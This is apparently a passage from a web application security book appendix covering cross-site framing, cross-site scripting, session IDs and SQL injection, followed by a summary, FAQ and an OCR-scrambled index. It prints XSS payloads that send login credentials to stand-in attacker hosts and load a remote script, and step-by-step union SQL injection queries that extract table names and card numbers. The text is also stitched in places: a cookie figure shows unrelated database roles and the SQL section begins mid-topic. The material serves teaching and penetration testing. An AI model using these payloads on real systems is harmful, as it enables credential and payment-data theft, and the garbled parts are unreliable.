Recently, a bank's customers were being phished with a different type of attack that took advantage of a vulnerability in the real bank's Web application, one called cross-site framing.
In this case, the phishing attack didn't need to employ a mock Web site; instead it sent the victims to the real bank Web site, a trusted domain. The phishers exploited a page that intentionally displayed third-party content. The location of the content to be displayed in the frame was specified in the URL, as demonstrated in Figure B.15. There are ways to do this safely by examining the location within the server-side code to ensure that the URL passed to the page is legitimate, but in this case the needed validation wasn't performed, and the page would load into the frame any content that was specified in the URL. The phishers then created a mock login form on another site and specified the location of that form in the URL, as demonstrated in Figure B.16. Now the phishers' Web site was framed within the original site.

Figure B.15 The Frame Source in This URL Is a Dead Giveaway
http://www.site.com/main/dspPage.asp?page=http://news_site.com/latestnews.jsp

Figure B.16 The Cross-Site Framing Bait
[Figure content not recoverable.]

By phishing that URL around through legitimate-looking e-mails, the scammers then attempted to dupe the bank's actual customers into logging into their form. Figure B.16 shows the modified URL that can now be used in the phish bait. Note that the host and domain are those of the original site, so even a consumer who scrutinizes them still stands a chance of being fooled.

Figure B.17 HTTP Response That Suggests Susceptibility to Cross-Site Scripting
Request:
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Connection: Close

userid=JohnDoe&password=jdoe24

Response:
Content-Length: 114
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASDSAASB=BHKJPIICOCELOCHCABKAJLFN; path=/
Cache-control: private

<html><b> Welcome back JohnDoe </b><br> <br><h4>Please check out the news message board posts </h4>

This classic example of a client-side attack demonstrates some key characteristics of such attacks:

■ They don't attack the site directly but rather indirectly through the users of the site.
■ They typically trick the main site into interacting with a third party by injecting some form of content.
■ They get to leverage the trust between the users and the main site, since the third-party interaction is done by the actual, real site and not a fake one.

This particular vulnerability is relatively rare, since few sites frame third-party sites and actually embed the full URLs into their queries. A much more commonly found vulnerability is cross-site scripting (abbreviated XSS). Cross-site scripting exists when the Web site accepts input that it shouldn't (as in the previous example) and then sends that input back to the browser. This could be in a login page, where the username is displayed back to the browser, or in a search field, where the search terms are displayed, but it can actually exist anywhere. For example, look at the request and response in Figure B.17. We see that the page cklogin.asp takes the value supplied for the userid parameter and displays that value back in the page. This is the first test necessary to identify XSS: finding the replay, where input is echoed back as output. For this to be an actual XSS vulnerability, however, the page must accept and replay JavaScript without performing any validation on it.

The simplest way to test for this is to enter script into the parameter and see if it is echoed back to the browser. Figure B.18 shows a request packet being modified; the legitimate value for the parameter named userid is replaced with a simple JavaScript.

Figure B.18 HTTP Request Being Modified to Insert a Script
[Screenshot: proxy request editor showing Connection: Close, the cookie ASPSESSIONIDASDSAASB=MHKJPIICJJJKDJPFPLIDPDHK, and post data in which the userid value has been replaced by the injected script, followed by &password=jdoe24. A context menu offers URL Decode, Unicode Encode, Unicode Decode, Base64 Encode, Base64 Decode, Compress, and Decompress.]

Figure B.18 also demonstrates encoding the parameters. When manipulating packets directly, you must remember that the Content-Length header has to be updated to reflect the new length of the post data string. It might also be necessary to encode the input. Web browsers do this for you automatically, and any packet editor you use should allow you to do this as well.

After you've injected the script into the request, simply analyze the response. If the script comes back in the response unmodified, that parameter is vulnerable to cross-site scripting. Figure B.19 shows the script returned in our example response. The application intends to write "Welcome Back [username]" but instead writes "Welcome Back [JavaScript]" since it believes the actual username is the JavaScript expression.

Figure B.19 Cross-Site Scripting Vulnerability in the HTTP Response
<html><b> Welcome back <script>alert()</script> </b><br> <br><h4>Please check out the news message board posts </h4>

Escaping from Literal Expressions

If you can get a complete script returned in an HTTP response, the request parameter that was tested is vulnerable. Often, however, the script itself won't execute in the browser, because it was returned inside a literal statement.
The server-side code returns the script, but it's in some element the browser recognizes only as HTML and not as script. For instance, in Figure B.20, we see our test script returned, but this time inside an image tag. To get this script to properly execute, we need to escape the tag.

Figure B.20 The Test Script Is Returned Within an Image Tag and Is Not Executed
Request:
Content-Length: 31
Connection: Close
Cookie: ASPSESSIONIDASDSAASB=MHKJPIICJJJKDJPFPLIDPDHK

imgsrc=<script>alert()</script>

Response:
Content-Length: 53
Content-Type: text/html
Cache-control: private

<img src=" <script>alert()</script> " alt="an image">

Figure B.21 illustrates prefacing the injected script with the characters necessary to close the existing tag. This separates the script from the tag, but the remainder of the tag is now "stranded" and will print on the screen, as illustrated in Figure B.22. This, along with the "broken image" icon, certainly won't suffice in a proper hack; both must be cleaned up.

Figure B.21 Closing Existing Tag by Prefacing the Injected Script
Request:
imgsrc="><script>alert()</script>

Response:
Content-Length: 55
Content-Type: text/html
Cache-control: private

<img src=" "><script>alert()</script> " alt="an image">

Figure B.22 Tag with Separated Script
[Screenshot: the browser view shows a broken image icon followed by the stranded text " alt="an image">.]

The first task is removing the "giant red X" (which indicates the existence of a broken image link) from the screen. Figure B.23 shows prefacing the injection not just with the "> combination necessary to escape the tag but now with a height and width specification that ensures the icon isn't shown at all. At the end of the injection, a metatag is opened.
In the response we can see that we have successfully shrunk and closed the image, creating a nicely formed invisible tag. Figure B.24 shows the rendered results, which are, of course, completely blank now.

Figure B.23 Prefacing the Injection with a Height and Width Specification
Request:
Cookie: ASPSESSIONIDASDSAASB=MHKJPIICJJJKDJPFPLIDPDHK

imgsrc=" height=0 width=0><script>alert()</script><meta name="

Response:
Cache-control: private

<img src=" "height=0 width=0><script>alert()</script><meta name=" " alt="an image">

Figure B.24 Invisible Tag Results
[Screenshot: the browser view is blank.]

There are other ways of executing script as well. For instance, you can specify a remote script, as shown in Figure B.25, or instead embed the script into the image tag, as shown in Figure B.26.

Figure B.25 Loading a Remote Script
Request:
Cookie: ASPSESSIONIDASDSAASB=MHKJPIICJJJKDJPFPLIDPDHK

imgsrc=" height=0 width=0><script+src="http://thirdpartysite/xss.js"><meta name=

Response:
<img src=" "height=0 width=0><script src="http://thirdpartysite/xss.js"><meta name=" " alt="an image">

Figure B.26 Using an Event to Trigger the Script
Request:
Connection: Close
Cookie: ASPSESSIONIDASDSAASB=MHKJPIICJJJKDJPFPLIDPDHK

imgsrc=real_image.gif"+onmouseover="alert('ha!');"><meta name=

Response:
Content-Type: text/html
Cache-control: private

<img src=" real_image.gif" onmouseover="alert('ha!');"><meta name=" " alt="an image">

Once the injection is tested and confirmed, the actual attack needs to be formed. The JavaScript Document Object Model (DOM) provides several extremely useful capabilities to the developer and hacker alike.
For instance, JavaScript provides access to field values and is often used by developers to ensure that required information has been entered into forms. This same functionality also lets the hacker access information entered into the form via a cross-site scripting attack, as demonstrated in Figures B.27 and B.28.

Figure B.27 The Injected Script
userid=" onmouseover="alert('This is what was entered into the form: \r \r' +document.login.userid.value+' == '+document.login.password.value)">"&password=doh!nuts

Figure B.28 Accessing Form Values Via Script
[Screenshot: the proxy request shows the same injection URL-encoded in the userid parameter. In the browser, a Microsoft Internet Explorer alert box reads "This is what was entered into the form: JohnDoe == doh!nuts" over a login form that displays "Invalid login" with Userid and Pass fields and OK and Nope buttons.]

The next step is to get the information where it can be read. This is usually done by appending it to an image tag whose source is a remote Web server that the hacker has access to, as shown in Figure B.29. When the script is activated, the browser will attempt to load the image, making a call to the remote server with the stolen information in it. From there, the hacker simply has to read the Web logs for the stolen information. You can also use JavaScript to redirect windows, open new windows, and create framesets, all of which could display forged login pages. Figures B.30 and B.31 show an example of appending the form values to a window.open command; this is just one elaborate example of the fun to be had with cross-site scripting.

Figure B.29 Passing Credentials to the Third-Party Site Via an Image Tag
userid=" onmouseover="document.write(<img height=0 width=0 src='http://hackersite/'+document.login.userid.value+' == '+document.login.password.value)">"&password=doh!nuts

Figure B.30 Appending Form Values to a window.open Command
Request:
userid=JohnDoh" onmouseover="window.open('http://windowsshellscripting.com/fakeloginpage.asp?in1='+document.login.userid.value+'&in2='+document.login.password.value);&password=doh!nuts

Response:
<form action=cklogger.asp method=post name=login>
Userid: <input type=text name=userid value=" JohnDoh"onmouseover="window.open('http://windowsshellscripting.com/fakeloginpage.asp?in1='+document.login.userid.value+'&in2='+document.login.password.value); "><br>
Pass: <input type=password name=password value=" doh!nuts "><br>
<input type=submit value=OK><input type=reset value=Nope><br>

Figure B.31 And the Resulting Effect
[Screenshot: the proxy shows the URL-encoded request sent to http://127.0.0.1:80/cklogger.asp and the login form with Userid JohnDoh. A second browser window, opened at http://windowsshellscripting.com/fakeloginpage.asp, displays a forged "Thank you for visiting Big Bank" log-off page.]
[Note: this page would have quietly logged the credentials JohnDoh / doh!nuts.]

Cross-site scripting made big waves a few years ago when it was discovered in several popular Web-based e-mail providers. Unfortunately, XSS is still a very common vulnerability in Web applications. Defensive coding techniques require strong validation of all input for script tags and certain terms, as well as HTML encoding any printed output that is directly received from the browser.

Remember that anything that occurs on that page and is accessible via JavaScript is subject to theft via cross-site scripting. If the vulnerability occurs on a page that requests a username and password, those credentials are subject to theft. However, even if the page doesn't have any actual sensitive forms on it, the cookie itself can often be a big help to the hacker, since most cookies contain session identifiers that can be used to impersonate another user.

Session Hijacking

HTTP is a stateless protocol, and Web applications have no automatic way of knowing what has happened from one page to the next. This functionality must be built into the application by the developer and is typically done through the use of a session identifier. A session ID is essentially a serial number that identifies an individual to the site; it is given by the system at a user's initial visit and is offered up to the server by the browser on each subsequent request. The system looks up all pertinent information related to that session ID, then makes appropriate decisions based on it, such as to allow access to a certain page or to display certain items in the online shopping cart.

Session IDs must be protected because they are essentially a form of identification. Just as someone who steals an employee badge could gain unauthorized access to a building, someone who steals a session ID can gain unauthorized access to a system. For this reason, we follow some basic rules on handling session identifiers:

■ They must be uniquely generated so that no two users are ever assigned the same ID.
■ They must be random enough that nobody can predict a future ID or determine someone else's ID.
■ They must be long enough to prevent the brute-force guessing of an ID in use.

Session IDs are typically transmitted by cookies, though they're also commonly seen in post data (through hidden form fields) and queries. It really doesn't matter how or where they're stored, since they're all equally exposed in the packet. Usually a site will just use the session ID created by the server, but every once in a while developers create their own; these are most subject to abuse. Several large commercial Web sites have made headlines for failing to create unique and random session IDs. In some extreme cases, they simply incremented the number for each user, so that guessing someone else's ID was as simple as adding 1 to your own.

When session IDs aren't protected, they're subject to theft and reuse. Figure B.32 shows the result of logging into a popular free portal application. You can see that the server sets a new cookie reflecting the authenticated state.
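Returning to the three rules for session identifiers listed above (unique, unpredictable, long enough), the following is a minimal Python sketch of how a developer who must create their own IDs might satisfy them. It is an illustration only, not the method of any product discussed here; the function name new_session_id, the in-memory set of active IDs, and the 32-byte length are all assumptions made for the example.

```python
import secrets

# Assumption for this sketch: 32 random bytes (256 bits) is "long enough"
# to make brute-force guessing of an ID in use impractical.
SESSION_ID_BYTES = 32


def new_session_id(active_ids):
    """Return a fresh session ID that is not already in use.

    active_ids is a hypothetical in-memory set of IDs currently assigned;
    a real application would keep this in its session store.
    """
    while True:
        # secrets draws from the operating system's cryptographic random
        # source, so IDs cannot be predicted from earlier ones (unlike a
        # counter that is incremented for each user).
        candidate = secrets.token_urlsafe(SESSION_ID_BYTES)
        if candidate not in active_ids:  # uniqueness check
            active_ids.add(candidate)
            return candidate


active = set()
first = new_session_id(active)
second = new_session_id(active)
```

In practice the session ID created by the server or framework is usually the safer choice, as the text notes; a sketch like this only applies when a custom identifier is unavoidable.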
Figure B.32 The Cookie Changes to Reflect the Authenticated State

    db_backupoperator
    db_datareader
    db_datawriter
    db_ddladmin
    db_denydatareader
    db_denydatawriter
    db_owner
    db_securityadmin
    dbo
    guest
    public
The work goes very quickly when the page returns all records in the set. Many times the page will only return one record, in which case you'll need to manually iterate through the rows to get them all. This can be easily accomplished using Boolean operators. Look at this example, where we retrieve all the user tables from the database. The Sysobjects table stores lists of all objects in the database, and we'll ask for all tables where the user type is U. This means it's a user table, or created by the DBA (presumably for the application), and not a system table automatically created by the server.

The query:
storyid=0 union select name from sysobjects where xtype='U'
returns:
card_auths

The next step is to get another single record, but a different record. We'll simply tell the database that we want the next higher one in the list.

The query:
storyid=0 union select name from sysobjects where xtype='U' and name>'card_auths'
returns:
customer_names

The query:
storyid=0 union select name from sysobjects where xtype='U' and name>'customer_names'
returns:
News_articles

Continuing with this technique, we arrive at the following table names:

■ Card_auths
■ Customer_names
■ News_articles
■ Web_users

Getting the column names for a particular table is just as easy. We query the Syscolumns table for the column name. Here, however, we need to specify the particular ID number that relates that table back to sysobjects. We could query for each ID number manually and write it down, or we could simply inject a slightly more complex query:

storyid=0 union select name from syscolumns where id=(select id from sysobjects where name='card_auths')

This politely returns our first column in the card_auths table: card_auth_no. Next we iterate through, using the same technique as before.
storyid=0 union select name from syscolumns where id=(select id from sysobjects where name='card_auths') and name>'card_auth_no'

Actually grabbing data from the column follows the same methodology: get a row and use it to fetch the next, iterating through the records until you've satisfactorily scared your client:

storyid=0 union select card_no from card_auths
returns:
1234666633337890

storyid=0 union select card_no from card_auths where card_no>1234666633337890
returns:
1234678911114567

There are more techniques available for SQL injection, but they go beyond the scope of this book. New techniques include:

■ Evading single quote filters This is when the programmer knows to remove or replace single quotes. It was formerly thought that this step would remove the possibility of SQL injection against strings, while typing input would prevent it against integer values. There is a technique using a SQL function that will still allow the insertion of string values into the database.
■ Blind SQL injection This is an advanced technique for performing injections against pages that have completely handled and suppressed all error messages. With no error messages available, the hacker is essentially "groping around in the dark." With the right technique, however, the attacker can actually go about it in a methodical manner. It's definitely a time-consuming effort, but it works when it's done correctly.
■ At least two completely automated tools for performing SQL injection One is commercial and the other is freeware/loosely licensed.

Summary

The full spectrum of Web application vulnerabilities is very broad indeed and is only recently getting the attention it deserves.
Although the security issues of operating systems and other commercial software are well known, just as many (if not more) issues are prevalent in Web applications in use on the Internet and internally to organizations. Without properly secured Web applications, the security of the Web server or network is irrelevant to the Web site security, as the application itself becomes an extension of the perimeter. The material covered in this appendix represents the basics. Any penetration tester, application developer, or security engineer is encouraged to further his or her education and skills in Web application security through the various papers, sites, and products available to them.

References

White papers:

■ Cross-site scripting:
  ■ Cross-Site Scripting, by Kevin Spett, www.spidynamics.com/whitepapers/SPIcross-sitescripting.pdf
  ■ The Cross-Site-Scripting FAQ on CGI Security, www.cgisecurity.com/articles/
■ SQL injection (all three of these are excellent papers written by some of the sharpest minds in computer security):
  ■ Web Application Disassembly with ODBC Error Messages, by David Litchfield, www.nextgenss.com/papers/webappdis.doc
  ■ Advanced SQL Injection in SQL Server Applications, by Chris Anley, http://www.nextgenss.com/papers/advanced_sql_injection.pdf
  ■ Blind SQL Injection, by Kevin Spett, www.spidynamics.com/support/whitepapers/Blind_SQLInjection.pdf

Web sites:

■ The Open Web Application Security Project (OWASP), www.owasp.org, hosts an annual conference and local chapters on Web application security. The site offers many excellent papers as well as some tools.
■ CGI Security, www.cgisecurity.com, offers papers, articles, links, and more by Bob Auger.
■ Security Focus, www.securityfocus.com, the CNN of the InfoSec world.

E-mail:

■ Web Application Security on Security Focus, webappsec@securityfocus.com, moderated, moderate traffic.
This is the de facto OWASP list and deals only with Web application security.

Solutions Fast Track

Defining Web Application Security

☑ Web application security deals with securing the actual application being served on a Web site, not the Web server, network, or operating system.
☑ Web application security deals with your own software. It doesn't mean Trojans, viruses, spam, or Web filtering. These are all application-level issues that are important to life on the Net but have nothing to do with Web application security.
☑ Web application security is a necessary complement to your efforts to secure your servers and networks. Without a secure application, the security in these other areas is undermined.

The Uniqueness of Web Application Security

☑ Network and operating systems security typically deals with "known" vulnerabilities.
☑ Known vulnerabilities can benefit from a homogenous environment.
☑ Most Web applications are custom developed, so their vulnerabilities are unique to that application; they are not public, not "known."
☑ The lack of security in Web applications can generally be attributed to the lack of security awareness in the Web development industry and the lack of appropriate security testing.

Web Application Vulnerabilities

☑ Web hacking is an easy discipline and generally requires few tools.
☑ Traditional perimeter security is generally ineffective against Web application exploits.
☑ Web application vulnerabilities can exist in almost any facet of the application, from the logical construction of authentication mechanisms and session management down to individual function calls.

Constraints of Search Engine Hacking

☑ Search engines crawl only a portion of what's available to a hacker.
☑ Search engine hacking finds targets of opportunity, but don't rely on it as a security assessment of your application.
☑ You would be able to find anything exposed to Google just by crawling; however, the majority of Web application vulnerabilities require actively exercising the application.

Information and Vulnerabilities in Content

☑ Just by crawling or looking for common files, you can find a significant amount of information in a Web application. Some of this information could reveal vulnerabilities, but a great deal more information found via crawling will assist you in testing the logic of the code.
☑ Files such as robots.txt, FTP logs, and Web traffic reports will guide you to undisclosed portions of the site.
☑ Comments, error messages, system documentation, and other such forms of content are all sources of significant information for Web application testing. We've seen throughout this book how this data can be retrieved with search engines.
☑ Examine the client-side "programming" that many developers lean on. Hidden form fields, JavaScript, and cookies in particular are misused. This is old school, but many developers still don't realize that anything client-side can be abused.

Playing with Packets

☑ Serious Web application testing requires the ability to work at the packet level.
☑ Sniffers will expose the raw packet for viewing, but they don't allow modification.
☑ Local proxies intercept the traffic from your browser to the Web application and let you see the raw traffic as well as modify raw requests. More sophisticated proxies allow modification of the server response for testing browser behavior as well.

Code Vulnerabilities in Web Applications

☑ Vulnerabilities related to the code are by far the most serious Web application vulnerabilities.
☑ Client-side attacks such as cross-site scripting attack the users of a Web application to gain their access privileges. They usually require some sort of phishing scheme.
☑ Session management issues can allow a hacker to impersonate another user.
☑ SQL injection is an extremely serious vulnerability that essentially provides a hacker with direct access to your database by "fooling" the Web application into running a different database query than expected.
☑ Web application security is a major threat. The industry hasn't addressed it until recently, but millions of Web applications exist.
☑ The Web application is an extension of your perimeter. If it isn't secure, neither is your perimeter.
☑ Web application security has been receiving a great deal of attention lately. Learn as much about it as you can, and start practicing what you learn in your own organization.

Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com.

Q: What level of security does Secure Sockets Layer (SSL) provide against Web application attacks?

A: Almost none. SSL provides two functions, the first of which is that it authenticates a domain name to an entity. That is, it certifies that www.bigbank.com actually belongs to Big Bank. Second, SSL creates a "secure" encrypted tunnel to the server so that all communication back and forth is highly encrypted and not subject to "eavesdropping." When properly implemented, SSL is very effective at that. However, SSL provides absolutely no assurances regarding the messages sent across that tunnel; it merely ensures that they cannot be read by a third party. In the context of Web hacking, it simply means that the attack packets are protected from sniffing as they travel to and from the server.
Since many intrusion detection systems do not have the ability to read SSL-encrypted packets, this also means that your hacks get tunneled through any monitoring before executing against the server (a nice side benefit). All the high-end Web application security products available will function just as easily with HTTPS as HTTP. If yours doesn't, trade it in for something newer. Note that SSL isn't infallible, particularly if an attacker can position him- or herself as a man in the middle (MITM). One large sector we work with frequently has a terrible habit of using self-issued certificates, but they never push their root certificates down to their browsers. This means that their users are in the habit of "clicking through" SSL error messages, creating a ripe situation for a MITM to issue a fake cert instead.

Q: What is the most secure language to develop in?

A: We are asked this all the time, and it's a controversial question. We don't believe that any particular language is intrinsically more secure than another, though it is undeniable that certain platforms provide more mechanisms and capabilities for security than others do. Syngress publishes a great reference: The Programmer's Ultimate Security Desk Reference, by James Foster.

Q: What are some of the worst Web hacks you've ever seen or heard of?

A: We've gotten databases, source code, and admin access in under 5 minutes before, but this was all low-hanging fruit; no great hacking on our behalf was required. The worst hack we can think of in the news is one we read about in a Security Focus article written in September 2003 by Kevin Poulsen. It was a Web application that had lots of complete credit applications in cleartext that were in an unauthenticated portion of the Web site. As though that weren't bad enough, according to the article they were discovered because the filename was in an HTML comment.
The official from the company that Poulsen interviewed responded to it poorly and as a result was quoted in Business 2.0 magazine in a very unflattering manner. More recently, an online banking application in the United Kingdom "upgraded" its authentication mechanism to be more secure, until it was discovered that it allowed access with just a userid, no password necessary.

Q: What's the best way to learn more about Web application security?

A: Learn more about Web applications. You have to understand how Web applications work to develop any measure of expertise in Web app sec. In fact, the best minds in any realm of IT sec are all strong coders. Also, make sure that you learn the full spectrum of threats. Don't get tunnel vision on something like SQL injection just because it's cool; start from the top and drill down into details from there.

Q: Will my existing scanner find Web vulnerabilities?

A: Probably not. There are very few actual Web assessment scanners out there, and they are extremely specialized tools. If you have one, you'll know. The majority of scanners on the market today are general "network" scanners that are very focused on known vulnerabilities and the basics, such as open ports or risky services. For working entirely manually, a number of tools are available either freely or very inexpensively. The only automated tools worth looking at are the commercial scanners; these are extremely mature products and were all started a long time ago.

Q: Are Web application hacks really invisible to IDS and firewalls?

A: For the most part, yes. There are certain hacks that are sure to set off a network IDS, such as a directory traversal attack. This existed as a daemon issue for so long (and has such a unique signature) that almost all NIDS will detect it. That said, however, we've done complete assessments through a variety of network IDS before and rarely get detected.
The few times we've been detected, our customer saw a mere fraction of the actual attacks performed. Likewise, we've done assessments on Web applications actually running on servers with host IDS on them, with equal results: lots of vulnerabilities, no alerts, since they tend to be more process and memory oriented. Web hacks execute within existing processes (the Web daemon and the database daemon), so no new processes should be launched unless the Web hacker attempts a full root kit.

Q: Is Web application security more important than network security?

A: That's your call. We'd call a buffer overflow on a service exposed to the DMZ pretty serious, but at the same time, if we can get to your database from our wireless PDAs while sitting on a train, that's pretty bad, too. So far there hasn't been a Web application-based worm, but such a thing is undoubtedly coming.

Q: Will securing my database help prevent SQL injection?

A: Securing your database will greatly mitigate SQL injection hacks. By partitioning access and restricting capabilities via standard hardening techniques (such as removing unnecessary procedures), you will greatly reduce (or completely negate) what can be done with SQL injection. Beware, though: don't forget to harden the Web application code as well, or you could find other vulnerabilities slipping through.

Q: Is it true that Web services are more secure than Web applications?

A: Absolutely not. Remember that although the presentation protocol has changed (there is now a SOAP envelope), it's essentially the exact same back-end code that would be used in a Web application, and thus it's susceptible to the exact same mistakes. The best Web application scanners will audit Web services in addition to Web applications.

¹ As reported by Netcraft.com in the September 2004 Web Server Survey, http://news.netcraft.com/archives/web_server_survey.html.
² The most heavily used rules are usually placed highest in the rule set to optimize performance.
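As a companion to the FAQ answer on SQL injection above, here is a minimal Python sketch of what "hardening the Web application code" might look like for the storyid parameter used in this appendix's examples. It combines the two ideas the text mentions: typing the input (storyid must be an integer) and keeping user input out of the SQL string by binding it as a parameter. The sqlite3 in-memory database, the stories table, its title column, and the function name fetch_story_title are all assumptions made for the illustration; the application in the appendix ran against a different database server.

```python
import sqlite3


def fetch_story_title(conn, raw_storyid):
    """Look up a story title for a storyid value received from the browser."""
    # Typing the input: anything that is not a plain integer is rejected
    # before it gets near the database.
    try:
        story_id = int(raw_storyid)
    except (TypeError, ValueError):
        return None
    # Parameter binding: the value is passed separately from the SQL text,
    # so it can never be interpreted as part of the query.
    row = conn.execute(
        "SELECT title FROM stories WHERE storyid = ?", (story_id,)
    ).fetchone()
    return row[0] if row else None


# Hypothetical schema and data, for demonstration only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE stories (storyid INTEGER PRIMARY KEY, title TEXT)")
conn.execute("INSERT INTO stories VALUES (1, 'Hello')")

legit = fetch_story_title(conn, "1")
attack = fetch_story_title(
    conn, "0 union select name from sysobjects where xtype='U'"
)
```

With this shape, the union-based input from the earlier examples fails the integer check and never reaches the database, while a legitimate storyid is looked up as before. Database hardening remains a useful second layer, as the answer above points out.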
syngress.com Symbols and Numerals — (minus) operator, 19—20 I (pipe symbol), 20, 374 + (plus) operator, 19 ? (question mark), 25 (quotation mark), 16, 18 # sign (Crosshatch), 325 Oday (zero-day) exploits, 182 10-word linTit, 16-17 80/20 rule, 157-158 Index Access badges, 143 Access database, 475 Account, creating, 369-371, Active Server Page (ASP) dumps, 239 error messages, 238—239 Actual security, 425-427 Address, masking, 167 Address books, 280 Addresses, e-mail, locating, admin \ administrator search| 210-212 Advanced Groups Search link, 8 Advanced Search link, 4 Advertisements, pop-up, 1 Advisories, 186-187, 190 AIM (AOL Instant Messegsgr) buddy Hsts, 283 Alarm, 429 aUintext operator, 43, 49-50, 77. allintitle operator, 43, 48—4' hnk,8 aUinurl operator, 43, 51—52, 78 Alt. group links, 8 AltaVista, operators in, 85-86 Am^ln "wish Hsts," 142 AND operator, 18-19, 374 Anomaly 426-427 Anonymity via caches, 88-95 AOL Instant Messenger (AIM) buddy lists, 283 Apache Web servers default settings, 330 default Web pages, 242-244 documentation, default, 247 error messages, 229-238 error-page titles, 236—237 securing, 360 server tag, disabling, 261—262 versions, 105—108 API. see Application Programming Interface (API) Apple Gooscan, 333 *^ " Appliance, Google, 334 Application Programming Interface (API) unt, creating, 369- C implementation, 397-405 C# implementation, 393—397 filt e r p arameter, 372 liceTKe keys, 128, 348, 369 limitations, 376—377 Perl implementation, 386—390, 406-411 Python implementation, 390-393 sample code, 377—383 search parameters, 371-372 search requests, 375-376 search responses, 376-377 486 Index using, 158-159 Application security, see Web application security (Web app sec) as_... variables, 28—29 ASP. 
see Active Server Page (ASP) Assessments external blind, 152 physical, 143 preassessment information- gathering techniques, 122 tools, 238 Asterisks (*), 15, 17 Athena tool checking exposure, 361 configuration files, 345-348 description, 343-345 Web site, 359 Attack libraries, 384-386 Attacks, client-side, 459-462 Auditing organizations, government, 420 Authentication, 264, 428, 442 Authentication forms, 328 author operator, 66-69 Authors, searching, 66-69, 164-166 Auto-googling black-hat, 368 C implementation, 397-405 C# implementation, 393—397 Perl implementation, 386—390, 406-411 Python implementation, 390—393 white-hat, 375-377 Automated grinding, 312-315 Automated trolling for e-mail, 128-134 Automatic URL removal, 355-356 Automation libraries, 384-386 Axis StorPoint servers, locating, 172 B Backup files, 111-114, 119 Badges, access, 143 Bars, 145 Base searches, 22 Belkin Cable/DSL routers, locating, 172 Bi-directional link extractor (BiLE) program, 161—164 "Big iron" targets, 159 BiLE (Bi-directional link extractor) program, 161-164 Biz. group Unks, 8 Black-hat auto-googling, 368 BlackHat, 2003, 154, 160 Blind security assessment, 152 Blogs, 140 Boolean operators, 18, 43, 58 Bots. 
see Crawlers bphonebook operator, 73 Buddy lists, AOL Instant Messenger (AIM), 283 Built-in cameras, 145 Business phone numbers, searching for, 72-73 c C code file extension (.c), 182-183 C implementation of API, 397-405 C# implementation of API, 393-397 Cache anonymity via, 88—95 Index 487 banners, 89 headers, 94-95 preventing, 325-327 viewing via cut and paste, 93-94 cache operator, 62-63 Cached sites, searching, 62-63 Cameras, built-in, 145 Case sensitivity, 14—15 CGI scanning, 197-199, 201, 406-411 Characters hexadecimal codes, 26 special, 26, 43 Chat log files, 280 Cisco products, locating, 172 Client-side attacks, 459-462 Code sample, 377-383 Code strings, common, 184—186 Coffee shops, 144 Colliding operators, 75 Colons ignored, 191 Combining advanced operators, 43, 75-76 Command injection, 301, 308, 442-443, 471-474, 484 Command-line browsers, 156-157 Comments, HTML, 447-448 Common code strings, 184-186 Comp. group links, 8 Company intranets, 124 Concern, 426 Confidentiality, 428 Configuration files description, 291 finding, 292-295 httpd.conf, 231, 261-262, 325 search examples, 295—297 support files, 304 Connections, logging, 88-89 Constraints of search-engine hacking, 443-445 Contact, nonconfi-ontational, 143 Contact list files, 283 Continuity, 429 Conversion to HTML or text, 56—58 Cook, Norman, 326 Cookies, 4, 456, 458, 468-471 count parameter for Gooscan, 337 Crackers, password, 273 Crawlers guarding against, 323 instructions for, 325 META line, 327-328 robots.txt files, 325-326, 360, 445-446 user-agent field, 325 Crawling, 155-156 Crawling, disabling, 119 Credit-card numbers, searching for, 276-278 Criteria for searches, 365-1305 Cross-site framing, 460 Cross-site scripting (XSS), 461-462, 466-468 Crosshatch (# sign), 325 CubeCart, 189 Cut-and-paste viewing of cache, 93-94 CuteNews, 190-193 D Data networks channel, 423 Databases database files, 310-311 488 Index dumps, 309-310 enumerating, 471, 475-477 error messages, 306-308 information leaks, 319 
login portals, 302-304 support files, 304-306 daterange operator, 64-65 Dates, Julian, 64 Dates within a range, searching, 64-65 Debugging scripts, 304 Default documentation, 246-248 Default programs, 249-250 Default settings, 330 Default Web pages Apache Web servers, 242-244 Internet Information Server (IIS), 244-245 Netscape servers, 245 use of, 241 define operator, 72 Definitions of terms, 72 DejaNews. see Newsgroups DejaNews (deja.com), 6-7 Delis, 144-145 Demonstration pages, 187-189 Diners, 144-145 Directory listings description, 99-100 disabling, 324-325 files, finding, 102-103 FTP log files, 446-447 "Index of," 100-102 locating, 100-102 missing index files, 324—325 preventing caching, 325-327 robots.txt files, 325-327, 360, 445-446 server tag, 223—225 Disabling directory listings, 324—325 Disclosure of information, 443 dns-mine.pl script, 158-159, 377-383 Document Object Model (DOM), 465-466 Documentation, default, 246-248 DOM QavaScript Document Object Model), 465-466 Domains determination, 154-155 finding, 155-156 name formation, 152 searching, 52-54 Dumps Active Server Page (ASP), 239 databases, 309-310 see also tcpdump command Dumps of databases, 309-310 E E-mail addresses, locating, 137-138, 312-315 folders, personal, 135 lists. Web-based, 141 relationships, 139-140 trolling, automated, 128-134 eBay phishing, 278 employee. ID \ "your username is" searches, 209 Employment postings, 126 Enumerating databases, 471, 475-477 error \ warning searches, 206-207 Error messages Active Server Page (ASP), 238-239 Index 489 Apache Web server, 229-238 applications', 238-241 databases, 306-308 finding, 225-229 Google, 44-45 Internet Information Server (IIS), 225-229 page titles. 
